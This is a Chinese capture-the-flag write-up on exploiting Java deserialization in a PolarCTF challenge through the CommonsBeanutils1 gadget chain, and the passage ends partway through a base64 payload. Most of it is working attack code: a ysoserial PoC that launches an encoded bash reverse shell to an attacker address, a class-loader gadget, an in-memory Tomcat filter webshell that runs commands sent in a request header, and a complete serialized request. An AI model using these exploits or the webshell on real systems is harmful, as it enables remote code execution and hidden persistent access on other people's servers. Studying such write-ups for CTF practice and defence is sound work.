polar CTF CB链

一、题目
在这里插入图片描述

二、解答
(正常套路,这道题解不出,快速向下面看)
1、通过jar包,可以看到/user路由下有反序列化操作
在这里插入图片描述
看到存在commons-beanutils依赖且版本为1.9.2,可利用CB链Getshell。

使用ysoserial项目中的CommonsBeanutils1链写一个POC,注意确保ysoserial项目中的pom.xml中的commons-beanutils与题目一致;

ysoserial项目地址:https://github.com/frohoff/ysoserial

编辑Evil类内容如下:

package ysoserial.poc;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;
​
public class MyExec extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
    static {
        try {
            Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4x5MDAxIDA+JjE=}|{base64,-d}|{bash,-i}");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

自定义命令如下:

Runtime.getRuntime().exec("bash -c {echo,反弹shell的payload Base64编码}|{base64,-d}|{bash,-i}");

Payload生成类如下:

package ysoserial.poc;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;import java.io.*;
import java.util.Base64;
import java.util.PriorityQueue;import ysoserial.payloads.util.Reflections;
​
public class PoC {
​
    public static void main(String[] args) throws Exception {
​
        TemplatesImpl templates = getTemplate();
​
        // mock method name until armed
        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
​
        // create queue with numbers and basic comparator
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later
        queue.add("1");
        queue.add("1");
​
        // switch method called by comparator
        Reflections.setFieldValue(comparator, "property", "outputProperties");
​
        // switch contents of queue
        final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        queueArray[0] = templates;
        queueArray[1] = templates;
​
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(queue);
        byte[] bytes = byteArrayOutputStream.toByteArray();
        System.out.println(Base64.getEncoder().encodeToString(bytes));
//        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
//        ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
//        objectInputStream.readObject();
    }
    public static TemplatesImpl getTemplate() throws Exception {
        ClassPool classPool = ClassPool.getDefault();
        CtClass clz = classPool.get(MyExec.class.getName());
        TemplatesImpl obj = new TemplatesImpl();
        Reflections.setFieldValue(obj, "_bytecodes", new byte[][]{clz.toBytecode()});
        Reflections.setFieldValue(obj, "_name", "HelloTemplatesImpl");
        Reflections.setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        return obj;
    }
}

3、漏洞利用
攻击机监听端口:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这种传统方法这道题不好用
下面才是真正的解题步骤<------------------------------------------------------------------------------------------------这才是开始
1、不出网利用(动态类加载)首先需要简单改造一下ysoserial定义一个类加载器:

package ysoserial;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.util.Base64;
​
public class MyClassLoader extends AbstractTranslet {
    static{
        try{
            javax.servlet.http.HttpServletRequest request = ((org.springframework.web.context.request.ServletRequestAttributes)org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getRequest();
            java.lang.reflect.Field r=request.getClass().getDeclaredField("request");
            r.setAccessible(true);
            org.apache.catalina.connector.Response response =((org.apache.catalina.connector.Request) r.get(request)).getResponse();
            javax.servlet.http.HttpSession session = request.getSession();
​
            String classData=request.getParameter("classData");
            System.out.println("classData:"+classData);
​
            byte[] classBytes = Base64.getDecoder().decode(classData);
            java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass",new Class[]{byte[].class, int.class, int.class});
            defineClassMethod.setAccessible(true);
            Class cc = (Class) defineClassMethod.invoke(MyClassLoader.class.getClassLoader(), classBytes, 0,classBytes.length);
            cc.newInstance().equals(new Object[]{request,response,session});
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public void transform(DOM arg0, SerializationHandler[] arg1) throws TransletException {
    }
    public void transform(DOM arg0, DTMAxisIterator arg1, SerializationHandler arg2) throws TransletException {
    }
}

然后在ysoserial.payloads.util包的Gadgets类中照着原有的createTemplatesImpl方法添加一个createTemplatesImpl(Class c),参数即为我们要让服务端加载的类,如下直接将传入的c转换为字节码赋值给了_bytecodes

public static <T> T createTemplatesImpl(Class c) throws Exception {
    Class<T> tplClass = null;if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) {
        tplClass = (Class<T>) Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl");
    }else{
        tplClass = (Class<T>) TemplatesImpl.class;
    }
​
    final T templates = tplClass.newInstance();
    final byte[] classBytes = ClassFiles.classAsBytes(c);
​
    Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
        classBytes
    });
​
    Reflections.setFieldValue(templates, "_name", "Pwnr");
    return templates;
}

以CB链为例写一个POC

package ysoserial.poc;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;import java.io.*;
import java.util.Base64;
import java.util.PriorityQueue;import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.Reflections;
​
public class PoC {
​
    public static void main(String[] args) throws Exception {
​
        final TemplatesImpl templates = Gadgets.createTemplatesImpl(ysoserial.MyClassLoader.class);
        //final TemplatesImpl templates = Gadgets.createTemplatesImpl(ysoserial.poc.Exp.class);
        //final TemplatesImpl templates = getTemplate();
​
        // mock method name until armed
        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
​
        // create queue with numbers and basic comparator
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later
        queue.add("1");
        queue.add("1");
​
        // switch method called by comparator
        Reflections.setFieldValue(comparator, "property", "outputProperties");
​
        // switch contents of queue
        final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        queueArray[0] = templates;
        queueArray[1] = templates;
​
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(queue);
​
        byte[] bytes = byteArrayOutputStream.toByteArray();
​
        System.out.println(Base64.getEncoder().encodeToString(bytes));
​
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
        ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
        objectInputStream.readObject();
    }
//  public static TemplatesImpl getTemplate() throws Exception {
//
//        ClassPool classPool = ClassPool.getDefault();
//        CtClass clz = classPool.get(Tomcat_Echo_inject_Filter.class.getName());
//
//        TemplatesImpl obj = new TemplatesImpl();
//        Reflections.setFieldValue(obj, "_bytecodes", new byte[][]{clz.toBytecode()});
//        Reflections.setFieldValue(obj, "_name", "HelloTemplatesImpl");
//        Reflections.setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
//
//        return obj;
//    }
}

接下来即可写一个恶意类,该类可应用于不出网情景,可将简单的命令执行回显在response的Header中,

为了方便注册filter,我直接让该类实现了Filter接口,在doFilter方法中完成Exp的主要逻辑,在equals方法中进行filter的动态注册

package ysoserial.poc;import javax.servlet.*;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.stream.Collectors;
​
public class Exp implements javax.servlet.Filter{
    private javax.servlet.http.HttpServletRequest request = null;
    private org.apache.catalina.connector.Response response = null;
    private javax.servlet.http.HttpSession session =null;
​
    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
    }
    public void destroy() {}
    @Override
    public void doFilter(ServletRequest request1, ServletResponse response1, FilterChain filterChain) throws IOException, ServletException {
        javax.servlet.http.HttpServletRequest request = (javax.servlet.http.HttpServletRequest)request1;
        javax.servlet.http.HttpServletResponse response = (javax.servlet.http.HttpServletResponse)response1;
        javax.servlet.http.HttpSession session = request.getSession();
        String cmd = request.getHeader("Polar-CMD");
        System.out.println(cmd);
        if (cmd != null) {
            //System.out.println("1");
            response.setHeader("Polar-START", "OK");
            // 使用 ProcessBuilder 执行命令
            Process process = new ProcessBuilder(cmd.split("\\s+"))
                .redirectErrorStream(true)
                .start();
            //System.out.println("2");
            // 获取命令执行的输入流
            InputStream inputStream = process.getInputStream();
​
            // 使用 Java 8 Stream 将输入流转换为字符串
            String result = new BufferedReader(new InputStreamReader(inputStream))
                .lines()
                .collect(Collectors.joining(System.lineSeparator()));
            System.out.println("3");
            response.setHeader("Polar-RESULT",result);} else {
            filterChain.doFilter(request, response);
        }
    }
​
    public boolean equals(Object obj) {
        Object[] context=(Object[]) obj;
        this.session = (javax.servlet.http.HttpSession ) context[2];
        this.response = (org.apache.catalina.connector.Response) context[1];
        this.request = (javax.servlet.http.HttpServletRequest) context[0];
​
        try {
            dynamicAddFilter(new Exp(),"Shell","/*",request);
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }return true;
    }
​
    public static void dynamicAddFilter(javax.servlet.Filter filter,String name,String url,javax.servlet.http.HttpServletRequest request) throws IllegalAccessException {
        javax.servlet.ServletContext servletContext=request.getServletContext();
        if (servletContext.getFilterRegistration(name) == null) {
            java.lang.reflect.Field contextField = null;
            org.apache.catalina.core.ApplicationContext applicationContext =null;
            org.apache.catalina.core.StandardContext standardContext=null;
            java.lang.reflect.Field stateField=null;
            javax.servlet.FilterRegistration.Dynamic filterRegistration =null;
​
            try {
                contextField=servletContext.getClass().getDeclaredField("context");
                contextField.setAccessible(true);
                applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(servletContext);
                contextField=applicationContext.getClass().getDeclaredField("context");
                contextField.setAccessible(true);
                standardContext= (org.apache.catalina.core.StandardContext) contextField.get(applicationContext);
                stateField=org.apache.catalina.util.LifecycleBase.class.getDeclaredField("state");
                stateField.setAccessible(true);
                stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTING_PREP);
                filterRegistration = servletContext.addFilter(name, filter);
                filterRegistration.addMappingForUrlPatterns(java.util.EnumSet.of(javax.servlet.DispatcherType.REQUEST), false,new String[]{url});
                java.lang.reflect.Method filterStartMethod = org.apache.catalina.core.StandardContext.class.getMethod("filterStart");
                filterStartMethod.setAccessible(true);
                filterStartMethod.invoke(standardContext, null);
                stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTED);
            }catch (Exception e){
            }finally {
                stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTED);
            }
        }
    }
}

构造完的请求包为,期中user后面的参数为PoC运行出来的payload,
classData为Exp.class文件中读出来的,命令如下

cat Exp.class|base64|sed ':label;N;s/\n//;b label'

可直接将该class文件复制到linux虚拟机中查询

POST /user?user=rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB%2bAARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX%2bAYIVOACAAB4cAAADvbK/rq%2bAAAANAC3CgAoAFMKAFQAVQcAVgoAAwBXCgAhAFgIAD0KABoAWQoAWgBbCgBaAFwHAF0KAAoAXgsAXwBgCABFCwBfAGEJAGIAYwcAZAoAEABTCABlCgAQAGYKABAAZwoAaABpCgBqAGsKAGwAbQcAbggAbwcAcAcASAkAcQByCgAaAHMKAHQAWwcAdQoAGgB2BwB3CgBxAHgKAHQAeQoAGgB6CgAhAHsHAHwKACYAfQcAfgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAZTHlzb3NlcmlhbC9NeUNsYXNzTG9hZGVyOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABGFyZzABAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAARhcmcxAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAfwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEABGFyZzIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACDxjbGluaXQ%2bAQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEAAXIBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAIcmVzcG9uc2UBAChMb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVzcG9uc2U7AQAHc2Vzc2lvbgEAIExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247AQAJY2xhc3NEYXRhAQASTGphdmEvbGFuZy9TdHJpbmc7AQAKY2xhc3NCeXRlcwEAAltCAQARZGVmaW5lQ2xhc3NNZXRob2QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAAmNjAQARTGphdmEvbGFuZy9DbGFzczsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAfAEAClNvdXJjZUZpbGUBABJNeUNsYXNzTG9hZGVyLmphdmEMACkAKgcAgAwAgQCCAQBAb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1NlcnZsZXRSZXF1ZXN0QXR0cmlidXRlcwwAgwCEDACFAIYMAIcAiAcAiQwAigCLDACMAI0BACVvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXF1ZXN0DACOAI8HAJAMAJEAkgwAkwCUBwCVDACWAJcBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgEACmNsYXNzRGF0YToMAJgAmQwAmgCbBwCcDACdAJ4HAJ8MAKAAowcApAwApQCmAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQALZGVmaW5lQ2xhc3MBAA9qYXZhL2xhbmcvQ2xhc3MHAKcMAKgATAwAqQCqBwCrAQAXeXNvc2VyaWFsL015Q2xhc3NMb2FkZXIMAKwArQEAEGphdmEvbGFuZy9PYmplY3QMAK4ArwwAsACxDACyALMMALQAtQEAE2phdmEvbGFuZy9FeGNlcHRpb24MALYAKgEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BADxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdENvbnRleHRIb2xkZXIBABRnZXRSZXF1ZXN0QXR0cmlidXRlcwEAPSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlczsBAApnZXRSZXF1ZXN0AQApKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQALZ2V0UmVzcG9uc2UBACooKUxvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXNwb25zZTsBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAKZ2V0U2Vzc2lvbgEAIigpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbjsBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBABBqYXZhL3V0aWwvQmFzZTY0AQAKZ2V0RGVjb2RlcgEAB0RlY29kZXIBAAxJbm5lckNsYXNzZXMBABwoKUxqYXZhL3V0aWwvQmFzZTY0JERlY29kZXI7AQAYamF2YS91dGlsL0Jhc2U2NCREZWNvZGVyAQAGZGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAEWphdmEvbGFuZy9JbnRlZ2VyAQAEVFlQRQEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEAD3ByaW50U3RhY2tUcmFjZQAhAB8AKAAAAAAABAABACkAKgABACsAAAAvAAEAAQAAAAUqtwABsQAAAAIALAAAAAYAAQAAAAoALQAAAAwAAQAAAAUALgAvAAAAAQAwADEAAgArAAAAPwAAAAMAAAABsQAAAAIALAAAAAYAAQAAACAALQAAACAAAwAAAAEALgAvAAAAAAABADIAMwABAAAAAQA0ADUAAgA2AAAABAABADcAAQAwADgAAgArAAAASQAAAAQAAAABsQAAAAIALAAAAAYAAQAAACIALQAAACoABAAAAAEALgAvAAAAAAABADIAMwABAAAAAQA0ADkAAgAAAAEAOgA7AAMANgAAAAQAAQA3AAgAPAAqAAEAKwAAAZUABgAIAAAAyLgAAsAAA7YABEsqtgAFEga2AAdMKwS2AAgrKrYACcAACrYAC00quQAMAQBOKhINuQAOAgA6BLIAD7sAEFm3ABESErYAExkEtgATtgAUtgAVuAAWGQS2ABc6BRIYEhkGvQAaWQMSG1NZBLIAHFNZBbIAHFO2AB06BhkGBLYAHhkGEh%2b2ACAGvQAhWQMZBVNZBAO4ACJTWQUZBb64ACJTtgAjwAAaOgcZB7YAJAa9ACFZAypTWQQsU1kFLVO2ACVXpwAISyq2ACexAAEAAAC/AMIAJgADACwAAABCABAAAAANAAoADgAUAA8AGQAQACUAEQAsABMANgAUAFAAFgBaABcAeAAYAH4AGQCmABoAvwAdAMIAGwDDABwAxwAeAC0AAABcAAkACgC1AD0APgAAABQAqwA/AEAAAQAlAJoAQQBCAAIALACTAEMARAADADYAiQBFAEYABABaAGUARwBIAAUAeABHAEkASgAGAKYAGQBLAEwABwDDAAQATQBOAAAATwAAAAkAAvcAwgcAUAQAAgBRAAAAAgBSAKIAAAAKAAEAbABqAKEACXB0AARQd25ycHcBAHhxAH4ADXg%3d HTTP/1.1
Host: 1ff2e0a3-f2f2-4526-a7d6-58bb50e63c95.www.polarctf.com:8090
Cache-Control: max-age=0
DNT: 1
Polar-CMD:ls
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 8494

classData=yv66vgAAADQBOwoARACeCQAlAJ8JACUAoAkAJQChBwCiBwCjCwAFAKQIAKULAAUApgkApwCoCgCpAKoIAKsIAKwLAAYArQcArggArwoAHgCwCgAPALEKAA8AsgoADwCzCgC0ALUHALYHALcKABcAuAoAFgC5CgAWALoKAKcAuwoAvAC9CwC%2bAL8HAMAIAMEIAMILAMMAxAcAewcAxQcAxgcAxwoAJQCeCADICADJCgAlAMoHAMsKACoAzAsABQDNCwDOAM8KAEQA0AgAegoAPgDRCgDSANMKANIA1AcA1QcA1gcA1wgA2AkA2QDaCgDSANsLAM4A3AkA3QDeCgDfAOALAIoA4QgA4gcA4woAPgDkCgDlANMKAOUA5gkA2QDnBwDoBwDpBwDqAQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTG9yZy9hcGFjaGUvY2F0YWxpbmEvY29ubmVjdG9yL1Jlc3BvbnNlOwEAB3Nlc3Npb24BACBMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uOwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQATTHlzb3NlcmlhbC9jYjEvRXhwOwEABGluaXQBAB8oTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOylWAQAMZmlsdGVyQ29uZmlnAQAcTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOwEACkV4Y2VwdGlvbnMHAOsBAAdkZXN0cm95AQAIZG9GaWx0ZXIBAFsoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlO0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOylWAQAHcHJvY2VzcwEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAAtpbnB1dFN0cmVhbQEAFUxqYXZhL2lvL0lucHV0U3RyZWFtOwEABnJlc3VsdAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEACHJlcXVlc3QxAQAeTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7AQAJcmVzcG9uc2UxAQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEAC2ZpbHRlckNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47AQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEAA2NtZAEADVN0YWNrTWFwVGFibGUHAMcHAOwHAO0HAO4HAKIHAKMHAMUHAMAHAO8BAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAFlAQAiTGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uOwEAA29iagEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAB2NvbnRleHQBABNbTGphdmEvbGFuZy9PYmplY3Q7BwDpBwDLAQAQZHluYW1pY0FkZEZpbHRlcgEAZChMamF2YXgvc2VydmxldC9GaWx0ZXI7TGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7KVYBABFmaWx0ZXJTdGFydE1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAMY29udGV4dEZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAEmFwcGxpY2F0aW9uQ29udGV4dAEALUxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25Db250ZXh0OwEAD3N0YW5kYXJkQ29udGV4dAEAKkxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0OwEACnN0YXRlRmllbGQBABJmaWx0ZXJSZWdpc3RyYXRpb24HAPEBAAdEeW5hbWljAQAMSW5uZXJDbGFzc2VzAQAqTGphdmF4L3NlcnZsZXQvRmlsdGVyUmVnaXN0cmF0aW9uJER5bmFtaWM7AQAGZmlsdGVyAQAWTGphdmF4L3NlcnZsZXQvRmlsdGVyOwEABG5hbWUBAAN1cmwBAA5zZXJ2bGV0Q29udGV4dAEAHkxqYXZheC9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0OwcA6gcA8gcA8wcA1QcA1gcA8QcA6AcA9AEAClNvdXJjZUZpbGUBAAhFeHAuamF2YQwATABNDABGAEcMAEgASQwASgBLAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlDAD1APYBAAlQb2xhci1DTUQMAPcA%2bAcA%2bQwA%2bgD7BwD8DAD9AP4BAAtQb2xhci1TVEFSVAEAAk9LDAD/AQABABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIBAANccysMAQEBAgwATAEDDAEEAQUMAQYBBwcBCAwBCQEKAQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgEAGWphdmEvaW8vSW5wdXRTdHJlYW1SZWFkZXIMAEwBCwwATAEMDAENAQ4MAQ8BEAcBEQwBEgETBwEUDAEVARYBABBqYXZhL2xhbmcvU3RyaW5nAQABMwEADFBvbGFyLVJFU1VMVAcA7gwAWgEXAQAeamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uAQAmb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVzcG9uc2UBABF5c29zZXJpYWwvY2IxL0V4cAEABVNoZWxsAQACLyoMAH4AfwEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uDAEYAE0MARkBGgcA8gwBGwEcDAEdAR4MAR8BIAcA8wwBIQEiDAEjASQBACtvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25Db250ZXh0AQAob3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkQ29udGV4dAEAJm9yZy9hcGFjaGUvY2F0YWxpbmEvdXRpbC9MaWZlY3ljbGVCYXNlAQAFc3RhdGUHASUMASYBJwwBKAEpDAEqASsHASwMAS0BL